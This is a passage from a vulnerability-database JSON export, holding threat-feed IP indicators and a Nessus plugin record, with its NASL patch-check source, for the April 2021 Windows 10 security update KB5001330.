"3174203392"}, "isp": "IFTNET", "lastip": {"netv4": "189.50.143.255", "num": "3174207487"}, "num": 28330, "org": "Telecomunicacoes Ltda"}, "threat": ["mirai"]}, {"id": "RST:EAF9E692-1482-3512-B926-3960EFD43A17", "bulletinFamily": "ioc", "title": "RST Threat feed. IOC: 186.237.140.76", "description": "Found **186[.]237.140.76** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **42**.\n First seen: 2021-04-14T03:00:00, Last seen: 2021-04-17T03:00:00.\n IOC tags: **generic**.\nASN 28330: (First IP 186.237.128.0, Last IP 186.237.143.255).\nASN Name \"IFTNET\" and Organisation \"Telecomunicacoes Ltda\".\nASN hosts 235 domains.\nGEO IP information: City \"Ribeiro Preto\", Country \"Brazil\".\n[https://rstcloud.net/](https://rstcloud.net/)", "published": "2021-04-18T00:00:00", "modified": "2021-04-14T00:00:00", "cvss": {}, "href": "", "reporter": "RST Threat Feed", "references": [], "cvelist": [], "immutableFields": [], "type": "rst", "lastseen": "2021-04-17T00:00:00", "history": [], "edition": 1, "hashmap": [{"key": "asn", "hash": "7308478d33144de0cca4afa1e636bc4c"}, {"key": "bulletinFamily", "hash": "e03daa7651c34372b0bf8c442bb00813"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "d3ba502dbd2c96b0b16da50547ffb76a"}, {"key": "domain", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "fp", "hash": "c923ad45656a014eb21907f615f1e97f"}, {"key": "geodata", "hash": "dd118c3bfa5e64eeb07706672d6af65a"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "iocScore", "hash": "f839262dc232451af324c7d367d07f9f"}, {"key": "iocType", "hash": "957b527bcfbad2e80f58d20683931435"}, {"key": "ip", "hash": "a5b46f6071bb9e9b1ad5415d8b3c5d31"}, {"key": "modified", "hash": "5de7e5e1e6abd2986b5e1bda0f57aee4"}, {"key": "published", "hash": "4a88fa0399dd4bfe0177cded531d1d73"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ecfdd35b9632d35ab17dbe9c46491f14"}, {"key": "tags", "hash": "db34099e531f5ecc1dd7c5e13c35811a"}, {"key": "threat", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "d76defbc817cc47875d3df759c4e32c2"}, {"key": "type", "hash": "d674dfcd8b4db6762bcb3667316d3bb9"}, {"key": "url", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "whois", "hash": "d41d8cd98f00b204e9800998ecf8427e"}], "hash": "8e445b30ba01685fe7f7bb47a4ce2db8ef4ccf0fe137112288a1c6d8cc7e3d19", "viewCount": 0, "enchantments": {}, "objectVersion": "1.5", "iocType": "ip", "ip": ["186.237.140.76"], "domain": [], "url": [], "iocScore": {"ioc_frequency": 0.95, "ioc_src": 56.12, "ioc_tags": 0.8, "ioc_total": 42.0}, "tags": ["generic"], "fp": {"alarm": "false", "descr": ""}, "whois": {}, "geodata": {"city": "Ribeiro Preto", "country": "Brazil", "region": "Sao Paulo"}, "asn": {"cloud": "", "domains": 235, "firstip": {"netv4": "186.237.128.0", "num": "3136126976"}, "isp": "IFTNET", "lastip": {"netv4": "186.237.143.255", "num": "3136131071"}, "num": 28330, "org": "Telecomunicacoes Ltda"}, "threat": []}], "nessus": [{"id": "SMB_NT_MS21_APR_5001330.NASL", "hash": "64e3d286c5ea304990ff33b049169a47", "type": "nessus", "bulletinFamily": "scanner", "title": "KB5001330: Windows 10 Version 2004 / Windows 10 Version 20H2 Security Update (April 2021)", "description": "The remote Windows host is missing a security update. Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2021-05-05T00:00:00", "modified": "2021-09-17T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/149259", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28310", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27093", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28348", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28437", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28334", "https://support.microsoft.com/en-us/help/5001330", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28444", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28325", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28355", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28435", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28317", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28352", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28326", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28332", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28331", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28438", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26415", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28320", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28439", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28443", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28447", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27094", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26413", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28349", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28337", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27095", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28315", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28350", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28354", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27086", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27072", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28335", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28345", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26417", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27092", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28313", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28346", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27096", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28314", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28358", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28340", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28356", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27089", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28319", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28446", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28434", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26416", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28343", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28445", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28342", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28318", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28441", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28330", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28436", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28442", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28351", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28339", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28311", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28309", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27088", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28333", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27090", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28312", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28321", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28316", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28327", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28322", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28353", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28328", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28338", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28440", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28323", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28347", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27079", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28329", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28357", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28341", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28336", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28324", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28344"], "cvelist": ["CVE-2021-26413", "CVE-2021-26415", "CVE-2021-26416", "CVE-2021-26417", "CVE-2021-27072", "CVE-2021-27079", "CVE-2021-27086", "CVE-2021-27088", "CVE-2021-27089", "CVE-2021-27090", "CVE-2021-27092", "CVE-2021-27093", "CVE-2021-27094", "CVE-2021-27095", "CVE-2021-27096", "CVE-2021-28309", "CVE-2021-28310", "CVE-2021-28311", "CVE-2021-28312", "CVE-2021-28313", "CVE-2021-28314", "CVE-2021-28315", "CVE-2021-28316", "CVE-2021-28317", "CVE-2021-28318", "CVE-2021-28319", "CVE-2021-28320", "CVE-2021-28321", "CVE-2021-28322", "CVE-2021-28323", "CVE-2021-28324", "CVE-2021-28325", "CVE-2021-28326", "CVE-2021-28327", "CVE-2021-28328", "CVE-2021-28329", "CVE-2021-28330", "CVE-2021-28331", "CVE-2021-28332", "CVE-2021-28333", "CVE-2021-28334", "CVE-2021-28335", "CVE-2021-28336", "CVE-2021-28337", "CVE-2021-28338", "CVE-2021-28339", "CVE-2021-28340", "CVE-2021-28341", "CVE-2021-28342", "CVE-2021-28343", "CVE-2021-28344", "CVE-2021-28345", "CVE-2021-28346", "CVE-2021-28347", "CVE-2021-28348", "CVE-2021-28349", "CVE-2021-28350", "CVE-2021-28351", "CVE-2021-28352", "CVE-2021-28353", "CVE-2021-28354", "CVE-2021-28355", "CVE-2021-28356", "CVE-2021-28357", "CVE-2021-28358", "CVE-2021-28434", "CVE-2021-28435", "CVE-2021-28436", "CVE-2021-28437", "CVE-2021-28438", "CVE-2021-28439", "CVE-2021-28440", "CVE-2021-28441", "CVE-2021-28442", "CVE-2021-28443", "CVE-2021-28444", "CVE-2021-28445", "CVE-2021-28446", "CVE-2021-28447"], "immutableFields": [], "lastseen": "2021-10-11T11:46:34", "history": [{"bulletin": {"id": "SMB_NT_MS21_APR_5001330.NASL", "hash": "db6d9adca7229db926171b776c948588663b832c64f335a09cc4cc1b7ec01e04", "type": "nessus", "bulletinFamily": "scanner", "title": "KB5001330: April 2021 Windows 2004 & 20H2 Security Update", "description": "The remote Windows host is missing a security update. Note that\nNessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2021-05-05T00:00:00", "modified": "2021-05-05T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/149259", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://support.microsoft.com/en-us/help/5001330"], "cvelist": ["CVE-2021-28437", "CVE-2021-26415", "CVE-2021-28311", "CVE-2021-28351", "CVE-2021-28447", "CVE-2021-28309", "CVE-2021-27072", "CVE-2021-27079", "CVE-2021-26417", "CVE-2021-26416", "CVE-2021-28317", "CVE-2021-28443", "CVE-2021-28352", "CVE-2021-28329", "CVE-2021-28441", "CVE-2021-28347", "CVE-2021-28349", "CVE-2021-28331", "CVE-2021-28440", "CVE-2021-28342", "CVE-2021-28348", "CVE-2021-28444", "CVE-2021-27092", "CVE-2021-28346", "CVE-2021-28442", "CVE-2021-28314", "CVE-2021-28446", "CVE-2021-28323", "CVE-2021-28332", "CVE-2021-28320", "CVE-2021-28436", "CVE-2021-28341", "CVE-2021-27096", "CVE-2021-28337", "CVE-2021-28338", "CVE-2021-28434", "CVE-2021-27093", "CVE-2021-27094", "CVE-2021-28313", "CVE-2021-28319", "CVE-2021-28356", "CVE-2021-28357", "CVE-2021-28318", "CVE-2021-27089", "CVE-2021-28316", "CVE-2021-27086", "CVE-2021-28353", "CVE-2021-28326", "CVE-2021-28315", "CVE-2021-28324", "CVE-2021-28340", "CVE-2021-28343", "CVE-2021-28327", "CVE-2021-28330", "CVE-2021-26413", "CVE-2021-28328", "CVE-2021-27095", "CVE-2021-28345", "CVE-2021-28445", "CVE-2021-28321", "CVE-2021-27088", "CVE-2021-28438", "CVE-2021-28335", "CVE-2021-28439", "CVE-2021-28344", "CVE-2021-28355", "CVE-2021-28312", "CVE-2021-28336", "CVE-2021-28322", "CVE-2021-28358", "CVE-2021-28354", "CVE-2021-27090", "CVE-2021-28334", "CVE-2021-28310", "CVE-2021-28435", "CVE-2021-28339", "CVE-2021-28333", "CVE-2021-28350", "CVE-2021-28325"], "immutableFields": [], "lastseen": "2021-05-06T03:38:39", "history": [], "viewCount": 2, "enchantments": {"dependencies": {"modified": "2021-05-06T03:38:39", "references": [{"idList": ["SECURELIST:A3D3514100806269750A23D748D34C59"], "type": "securelist"}, {"idList": ["THN:F163C7AB35BEF8E28924E14B02752181"], "type": "thn"}, {"idList": ["RAPID7BLOG:452CCDC1AEFFF7056148871E86A6FE26"], "type": "rapid7blog"}, {"idList": ["MS:CVE-2021-27088", "MS:CVE-2021-28441", "MS:CVE-2021-28314", "MS:CVE-2021-27090", "MS:CVE-2021-28324", "MS:CVE-2021-26417"], "type": "mscve"}, {"idList": ["CVE-2021-28447", "CVE-2021-28441", "CVE-2021-27092", "CVE-2021-27094", "CVE-2021-27086", "CVE-2021-28324", "CVE-2021-27088", "CVE-2021-28438", "CVE-2021-28322", "CVE-2021-27090"], "type": "cve"}, {"idList": ["SMB_NT_MS21_APR_5001337.NASL", "SMB_NT_MS21_APR_5001347.NASL", "SMB_NT_MS21_APR_5001387.NASL", "SMB_NT_MS21_APR_5001382.NASL", "SMB_NT_MS21_APR_5001389.NASL", "SMB_NT_MS21_APR_5001339.NASL", "SMB_NT_MS21_APR_VISUAL_STUDIO.NASL", "SMB_NT_MS21_APR_5001342.NASL", "SMB_NT_MS21_APR_5001335.NASL", "SMB_NT_MS21_APR_5001340.NASL"], "type": "nessus"}, {"idList": ["AKB:007C4393-6621-4656-8BFD-D0CFE64DCD65"], "type": "attackerkb"}], "rev": 2}, "score": {"modified": "2021-05-06T03:38:39", "rev": 2, "value": 5.7, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "149259", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(149259);\n script_version(\"1.1\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/05/05\");\n script_cve_id(\n \"CVE-2021-28447\",\n \"CVE-2021-28441\",\n \"CVE-2021-28356\",\n \"CVE-2021-28349\",\n \"CVE-2021-28342\",\n \"CVE-2021-28338\",\n \"CVE-2021-28320\",\n \"CVE-2021-28436\",\n \"CVE-2021-28348\",\n \"CVE-2021-28330\",\n \"CVE-2021-28343\",\n \"CVE-2021-28340\",\n \"CVE-2021-28328\",\n \"CVE-2021-28327\",\n \"CVE-2021-28440\",\n \"CVE-2021-28439\",\n \"CVE-2021-28351\",\n \"CVE-2021-28332\",\n \"CVE-2021-28321\",\n \"CVE-2021-28443\",\n \"CVE-2021-28442\",\n \"CVE-2021-28353\",\n \"CVE-2021-28346\",\n \"CVE-2021-28335\",\n \"CVE-2021-28324\",\n \"CVE-2021-28446\",\n \"CVE-2021-28434\",\n \"CVE-2021-28355\",\n \"CVE-2021-28345\",\n \"CVE-2021-28339\",\n \"CVE-2021-28319\",\n \"CVE-2021-28438\",\n \"CVE-2021-28437\",\n \"CVE-2021-28358\",\n \"CVE-2021-28341\",\n \"CVE-2021-28333\",\n \"CVE-2021-28326\",\n \"CVE-2021-28325\",\n \"CVE-2021-28445\",\n \"CVE-2021-28435\",\n \"CVE-2021-28354\",\n \"CVE-2021-28350\",\n \"CVE-2021-28347\",\n \"CVE-2021-28337\",\n \"CVE-2021-28334\",\n \"CVE-2021-28329\",\n \"CVE-2021-28323\",\n \"CVE-2021-28317\",\n \"CVE-2021-28444\",\n \"CVE-2021-28357\",\n \"CVE-2021-28352\",\n \"CVE-2021-28344\",\n \"CVE-2021-28336\",\n \"CVE-2021-28331\",\n \"CVE-2021-28322\",\n \"CVE-2021-28318\",\n \"CVE-2021-28316\",\n \"CVE-2021-28315\",\n \"CVE-2021-28314\",\n \"CVE-2021-28313\",\n \"CVE-2021-28312\",\n \"CVE-2021-28311\",\n \"CVE-2021-28310\",\n \"CVE-2021-28309\",\n \"CVE-2021-26417\",\n \"CVE-2021-26416\",\n \"CVE-2021-26415\",\n \"CVE-2021-26413\",\n \"CVE-2021-27096\",\n \"CVE-2021-27095\",\n \"CVE-2021-27094\",\n \"CVE-2021-27093\",\n \"CVE-2021-27092\",\n \"CVE-2021-27090\",\n \"CVE-2021-27089\",\n \"CVE-2021-27088\",\n \"CVE-2021-27086\",\n \"CVE-2021-27079\",\n \"CVE-2021-27072\"\n );\n script_xref(name:\"MSKB\", value:\"5001330\");\n script_xref(name:\"MSFT\", value:\"MS21-5001330\");\n\n script_name(english:\"KB5001330: April 2021 Windows 2004 & 20H2 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing a security update. Note that\nNessus has not tested for this issue but has instead relied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5001330\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released KB5001330 to address this issue.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-28327\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/04/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/05/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nvar bulletin, kbs, share;\n\nbulletin = 'MS21-04';\nkbs = make_list(\n '5001330'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'19041',\n rollup_date:'04_2021',\n bulletin:bulletin,\n rollup_kb_list:[5001330])\n||\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'19042',\n rollup_date:'04_2021',\n bulletin:bulletin,\n rollup_kb_list:[5001330])\n)\n\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "naslFamily": "Windows : Microsoft Bulletins", "cpe": ["cpe:/o:microsoft:windows"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2021-05-06T03:38:39", "differentElements": ["cvss", "cvss3", "sourceData"], "edition": 1}, {"bulletin": {"id": "SMB_NT_MS21_APR_5001330.NASL", "hash": "395af6dccd8d83f4b4f63cb7a7b4c90794defeaf219476544eb9854477521d14", "type": "nessus", "bulletinFamily": "scanner", "title": "KB5001330: April 2021 Windows 2004 & 20H2 Security Update", "description": "The remote Windows host is missing a security update. Note that\nNessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2021-05-05T00:00:00", "modified": "2021-05-05T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/149259", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://support.microsoft.com/en-us/help/5001330"], "cvelist": ["CVE-2021-28437", "CVE-2021-26415", "CVE-2021-28311", "CVE-2021-28351", "CVE-2021-28447", "CVE-2021-28309", "CVE-2021-27072", "CVE-2021-27079", "CVE-2021-26417", "CVE-2021-26416", "CVE-2021-28317", "CVE-2021-28443", "CVE-2021-28352", "CVE-2021-28329", "CVE-2021-28441", "CVE-2021-28347", "CVE-2021-28349", "CVE-2021-28331", "CVE-2021-28440", "CVE-2021-28342", "CVE-2021-28348", "CVE-2021-28444", "CVE-2021-27092", "CVE-2021-28346", "CVE-2021-28442", "CVE-2021-28314", "CVE-2021-28446", "CVE-2021-28323", "CVE-2021-28332", "CVE-2021-28320", "CVE-2021-28436", "CVE-2021-28341", "CVE-2021-27096", "CVE-2021-28337", "CVE-2021-28338", "CVE-2021-28434", "CVE-2021-27093", "CVE-2021-27094", "CVE-2021-28313", "CVE-2021-28319", "CVE-2021-28356", "CVE-2021-28357", "CVE-2021-28318", "CVE-2021-27089", "CVE-2021-28316", "CVE-2021-27086", "CVE-2021-28353", "CVE-2021-28326", "CVE-2021-28315", "CVE-2021-28324", "CVE-2021-28340", "CVE-2021-28343", "CVE-2021-28327", "CVE-2021-28330", "CVE-2021-26413", "CVE-2021-28328", "CVE-2021-27095", "CVE-2021-28345", "CVE-2021-28445", "CVE-2021-28321", "CVE-2021-27088", "CVE-2021-28438", "CVE-2021-28335", "CVE-2021-28439", "CVE-2021-28344", "CVE-2021-28355", "CVE-2021-28312", "CVE-2021-28336", "CVE-2021-28322", "CVE-2021-28358", "CVE-2021-28354", "CVE-2021-27090", "CVE-2021-28334", "CVE-2021-28310", "CVE-2021-28435", "CVE-2021-28339", "CVE-2021-28333", "CVE-2021-28350", "CVE-2021-28325"], "immutableFields": [], "lastseen": "2021-05-07T11:30:50", "history": [], "viewCount": 2, "enchantments": {"dependencies": {"modified": "2021-05-07T11:30:50", "references": [{"idList": ["SECURELIST:A3D3514100806269750A23D748D34C59"], "type": "securelist"}, {"idList": ["CVE-2021-26416", "CVE-2021-28441", "CVE-2021-27092", "CVE-2021-28314", "CVE-2021-27086", "CVE-2021-28353", "CVE-2021-28324", "CVE-2021-27088", "CVE-2021-28438", "CVE-2021-27090"], "type": "cve"}, {"idList": ["THN:F163C7AB35BEF8E28924E14B02752181"], "type": "thn"}, {"idList": ["RAPID7BLOG:452CCDC1AEFFF7056148871E86A6FE26"], "type": "rapid7blog"}, {"idList": ["SMB_NT_MS21_APR_5001337.NASL", "SMB_NT_MS21_APR_5001347.NASL", "SMB_NT_MS21_APR_5001387.NASL", "SMB_NT_MS21_APR_5001382.NASL", "SMB_NT_MS21_APR_5001389.NASL", "SMB_NT_MS21_APR_5001339.NASL", "SMB_NT_MS21_APR_VISUAL_STUDIO.NASL", "SMB_NT_MS21_APR_5001342.NASL", "SMB_NT_MS21_APR_5001335.NASL", "SMB_NT_MS21_APR_5001340.NASL"], "type": "nessus"}, {"idList": ["MS:CVE-2021-28441", "MS:CVE-2021-28314", "MS:CVE-2021-26416", "MS:CVE-2021-27090", "MS:CVE-2021-28324", "MS:CVE-2021-26417"], "type": "mscve"}, {"idList": ["AKB:007C4393-6621-4656-8BFD-D0CFE64DCD65"], "type": "attackerkb"}], "rev": 2}, "score": {"modified": "2021-05-07T11:30:50", "rev": 2, "value": 5.9, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "149259", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(149259);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/05/06\");\n\n script_cve_id(\n \"CVE-2021-26413\",\n \"CVE-2021-26415\",\n \"CVE-2021-26416\",\n \"CVE-2021-26417\",\n \"CVE-2021-27072\",\n \"CVE-2021-27079\",\n \"CVE-2021-27086\",\n \"CVE-2021-27088\",\n \"CVE-2021-27089\",\n \"CVE-2021-27090\",\n \"CVE-2021-27092\",\n \"CVE-2021-27093\",\n \"CVE-2021-27094\",\n \"CVE-2021-27095\",\n \"CVE-2021-27096\",\n \"CVE-2021-28309\",\n \"CVE-2021-28310\",\n \"CVE-2021-28311\",\n \"CVE-2021-28312\",\n \"CVE-2021-28313\",\n \"CVE-2021-28314\",\n \"CVE-2021-28315\",\n \"CVE-2021-28316\",\n \"CVE-2021-28317\",\n \"CVE-2021-28318\",\n \"CVE-2021-28319\",\n \"CVE-2021-28320\",\n \"CVE-2021-28321\",\n \"CVE-2021-28322\",\n \"CVE-2021-28323\",\n \"CVE-2021-28324\",\n \"CVE-2021-28325\",\n \"CVE-2021-28326\",\n \"CVE-2021-28327\",\n \"CVE-2021-28328\",\n \"CVE-2021-28329\",\n \"CVE-2021-28330\",\n \"CVE-2021-28331\",\n \"CVE-2021-28332\",\n \"CVE-2021-28333\",\n \"CVE-2021-28334\",\n \"CVE-2021-28335\",\n \"CVE-2021-28336\",\n \"CVE-2021-28337\",\n \"CVE-2021-28338\",\n \"CVE-2021-28339\",\n \"CVE-2021-28340\",\n \"CVE-2021-28341\",\n \"CVE-2021-28342\",\n \"CVE-2021-28343\",\n \"CVE-2021-28344\",\n \"CVE-2021-28345\",\n \"CVE-2021-28346\",\n \"CVE-2021-28347\",\n \"CVE-2021-28348\",\n \"CVE-2021-28349\",\n \"CVE-2021-28350\",\n \"CVE-2021-28351\",\n \"CVE-2021-28352\",\n \"CVE-2021-28353\",\n \"CVE-2021-28354\",\n \"CVE-2021-28355\",\n \"CVE-2021-28356\",\n \"CVE-2021-28357\",\n \"CVE-2021-28358\",\n \"CVE-2021-28434\",\n \"CVE-2021-28435\",\n \"CVE-2021-28436\",\n \"CVE-2021-28437\",\n \"CVE-2021-28438\",\n \"CVE-2021-28439\",\n \"CVE-2021-28440\",\n \"CVE-2021-28441\",\n \"CVE-2021-28442\",\n \"CVE-2021-28443\",\n \"CVE-2021-28444\",\n 